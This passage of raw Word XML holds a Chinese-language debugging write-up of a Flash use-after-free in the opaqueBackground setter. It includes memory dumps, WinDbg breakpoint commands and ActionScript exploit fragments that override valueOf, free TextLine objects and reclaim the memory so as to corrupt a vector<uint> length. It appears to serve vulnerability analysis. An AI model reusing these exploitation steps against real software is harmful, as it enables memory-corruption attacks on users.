    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099551b0  00000008 08d42000 00000069 00000000  ..... ..i.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099551d8  00000008 08d42000 0000006a 00000000  ..... ..j.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955200  00000008 08d42000 0000006b 00000000  ..... ..k.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955228  00000008 08d42000 0000006c 00000000  ..... ..l.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955250  00000008 08d42000 0000006d 00000000  ..... ..m.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955278  00000008 08d42000 0000006e 00000000  ..... ..n.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099552a0  00000008 08d42000 0000006f 00000000  ..... ..o.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099552c8  00000008 08d42000 00000070 00000000  ..... ..p.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099552f0  00000008 08d42000 00000071 00000000  ..... ..q.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955318  00000008 08d42000 00000072 00000000  ..... ..r.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955340  00000008 08d42000 00000073 00000000  ..... ..s.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955368  00000008 08d42000 00000074 00000000  ..... ..t.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955390  00000008 08d42000 00000075 00000000  ..... ..u.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099553b8  00000008 08d42000 00000076 00000000  ..... ..v.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099553e0  00000008 08d42000 00000077 00000000  ..... ..w.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955408  00000008 08d42000 00000078 00000000  ..... ..x.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>09955430  00000008 08d42000 00000079 00000000  ..... ..y.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955458  00000008 08d42000 0000007a 00000000  ..... ..z.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09955480  00000008 08d42000 0000007b 00000000  ..... ..{.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099554a8  00000008 08d42000 0000007c 00000000  ..... ..|.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>099554d0  00000008 08d42000 0000007d 00000000  ..... ..}.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233"/>
    <w:p w:rsidR="003D527F" w:rsidRDefault="00BF51D5" w:rsidP="004A6233">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="006C61E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackGroud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">obj </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09952020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09959020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09959418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09959810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>09959c08  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995a020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995a418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995a810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995ac08  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995b020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995b418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995b810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995bc08  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995c020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995c418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6233" w:rsidRDefault="004A6233" w:rsidP="004A6233">
      <w:r>
        <w:t>0995c810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00127592" w:rsidRDefault="00127592" w:rsidP="0063750F"/>
    <w:p w:rsidR="001B6358" w:rsidRDefault="001B6358" w:rsidP="0063750F"/>
    <w:p w:rsidR="002F4BD9" w:rsidRDefault="002F4BD9" w:rsidP="002F4BD9">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">8 </w:t>
      </w:r>
      <w:r w:rsidR="003109F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eset myclass valueof</w:t>
      </w:r>
      <w:r w:rsidR="00F25A84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4BD9" w:rsidRDefault="002F4BD9" w:rsidP="00813D3B">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>// set custom valueOf() for _mc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4BD9" w:rsidRDefault="002F4BD9" w:rsidP="00813D3B">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MyClass.prototype.valueOf = valueOf2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4BD9" w:rsidRDefault="002F4BD9" w:rsidP="002F4BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A0B1C" w:rsidRDefault="003A0B1C" w:rsidP="002F4BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此段代码重置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A0B1C" w:rsidRDefault="003A0B1C" w:rsidP="002F4BD9"/>
    <w:p w:rsidR="00F25A84" w:rsidRDefault="00F25A84" w:rsidP="00F25A84">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">9 Trigger </w:t>
      </w:r>
      <w:r w:rsidR="003D1216">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> valueOf2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25A84" w:rsidRPr="00F25A84" w:rsidRDefault="00F25A84" w:rsidP="00BD6E5E">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F4BD9" w:rsidRDefault="002F4BD9" w:rsidP="00BD6E5E">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// here we go, call the vulnerable setter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4BD9" w:rsidRDefault="002F4BD9" w:rsidP="00BD6E5E">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>_cnt = _arLen2-6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B6358" w:rsidRDefault="002F4BD9" w:rsidP="00BD6E5E">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>_ar[_cnt].opaqueBackground = _mc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6E5E" w:rsidRDefault="00BD6E5E" w:rsidP="002F4BD9"/>
    <w:p w:rsidR="004E45F2" w:rsidRDefault="001807C8" w:rsidP="002F4BD9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>set_opaqueBackground</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r w:rsidR="004E45F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置属性时会对参数调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001807C8" w:rsidRDefault="004E45F2" w:rsidP="002F4BD9">
      <w:r w:rsidRPr="004E45F2">
        <w:t>avmplus::AvmCore::integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行转换时会调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="00F40195">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里调用触发</w:t>
      </w:r>
      <w:r w:rsidR="00F40195">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAF,</w:t>
      </w:r>
      <w:r w:rsidR="00F40195">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidR="00706601">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接对</w:t>
      </w:r>
      <w:r w:rsidR="00706601">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>set_opauebackgroud</w:t>
      </w:r>
      <w:r w:rsidR="00706601">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数下断</w:t>
      </w:r>
      <w:r w:rsidR="00563AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，跟踪</w:t>
      </w:r>
      <w:r w:rsidR="00563AE4" w:rsidRPr="004E45F2">
        <w:t>avmplus::AvmCore::integer</w:t>
      </w:r>
      <w:r w:rsidR="00563AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到</w:t>
      </w:r>
      <w:r w:rsidR="00563AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r w:rsidR="00563AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00563AE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jit code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00614C06" w:rsidRDefault="00614C06" w:rsidP="002F4BD9"/>
    <w:p w:rsidR="00614C06" w:rsidRDefault="00FB7A5E" w:rsidP="00FB7A5E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>In valueOf2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3F7A" w:rsidRDefault="00BF3F7A" w:rsidP="00BF3F7A"/>
    <w:p w:rsidR="007E461F" w:rsidRDefault="00557991" w:rsidP="007E461F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1 R</w:t>
      </w:r>
      <w:r w:rsidR="007E461F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ecursive call set </w:t>
      </w:r>
      <w:r w:rsidR="007E461F">
        <w:t>opaqueBackground</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1787" w:rsidRDefault="009F1787" w:rsidP="00A516BE">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if (++_cnt &lt; _arLen2) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1787" w:rsidRDefault="009F1787" w:rsidP="00A516BE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// recursive call for next TextLine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3F7A" w:rsidRDefault="009F1787" w:rsidP="00A516BE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_ar[_cnt].opaqueBackground = _mc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1787" w:rsidRDefault="009F1787" w:rsidP="009F1787"/>
    <w:p w:rsidR="009F1787" w:rsidRDefault="00474956" w:rsidP="009F1787">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始时</w:t>
      </w:r>
      <w:r>
        <w:t>_cnt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x28 </w:t>
      </w:r>
      <w:r>
        <w:t>_arLen2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，满足条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环调用</w:t>
      </w:r>
      <w:r>
        <w:t>_ar[_cnt].opaqueBackground</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">_cnt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_arLen2</w:t>
      </w:r>
      <w:r w:rsidR="00AA237A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidR="001F271F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001F271F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidR="001F271F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="001F271F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次设置</w:t>
      </w:r>
      <w:r w:rsidR="001F271F">
        <w:t>opaqueBackground</w:t>
      </w:r>
      <w:r w:rsidR="001F271F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="00962E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，进入一个堆栈嵌套循环调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474956" w:rsidRDefault="00474956" w:rsidP="009F1787"/>
    <w:p w:rsidR="007E461F" w:rsidRDefault="007E461F" w:rsidP="009F1787">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里进行嵌套的</w:t>
      </w:r>
      <w:r w:rsidR="00C528BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是随后释放对象被占用后，</w:t>
      </w:r>
      <w:r w:rsidRPr="007E461F">
        <w:t>avmplus::AvmCore::integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用返回到</w:t>
      </w:r>
      <w:r w:rsidRPr="007E461F">
        <w:t>set_opaqueBackground</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中，后面有对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackgroudObj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行写操作，从而改写</w:t>
      </w:r>
      <w:r w:rsidR="00C41696">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新占用的</w:t>
      </w:r>
      <w:r w:rsidR="00C41696">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt; buffer</w:t>
      </w:r>
      <w:r w:rsidR="00C41696">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的长度值</w:t>
      </w:r>
      <w:r w:rsidR="005F7173">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E461F" w:rsidRPr="007E461F" w:rsidRDefault="007E461F" w:rsidP="009F1787"/>
    <w:p w:rsidR="00474956" w:rsidRDefault="007E461F" w:rsidP="008C5A13">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008C5A13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> free textline inner obj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="008C5A13" w:rsidP="00423E87">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>// free internal objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="008C5A13" w:rsidP="00423E87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for(var i:int=1; i &lt;= 5; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="008C5A13" w:rsidP="00423E87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_tb.recreateTextLine(_ar[_arLen2-i]);</w:t>
      </w:r>
      <w:r w:rsidR="00AA1695">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //0x2d&lt;= &lt;=</w:t>
      </w:r>
      <w:r w:rsidR="00AB3299">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00AA1695">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="00AB3299" w:rsidP="008C5A13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此段代码对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x29 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x2d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TextLineObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放，触发之前分配的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x390</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackgroudObj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028226E" w:rsidRDefault="00BD0E32" w:rsidP="00BD0E32">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时可以通过对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Array-&gt;m_buffer+8+0x2d*4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置读取断点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D13255" w:rsidRDefault="0028226E" w:rsidP="008C5A13">
      <w:r w:rsidRPr="0028226E">
        <w:t>dd 08d560b0 +0x8+0x2d*4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  //_ar[_arLen2-i]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028226E" w:rsidRDefault="0028226E" w:rsidP="008C5A13">
      <w:r w:rsidRPr="0028226E">
        <w:t xml:space="preserve">ba r 1 08d5616c  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidR="004B24F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置读取断点</w:t>
      </w:r>
      <w:r w:rsidR="004B24F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00506FD9">
        <w:rPr>
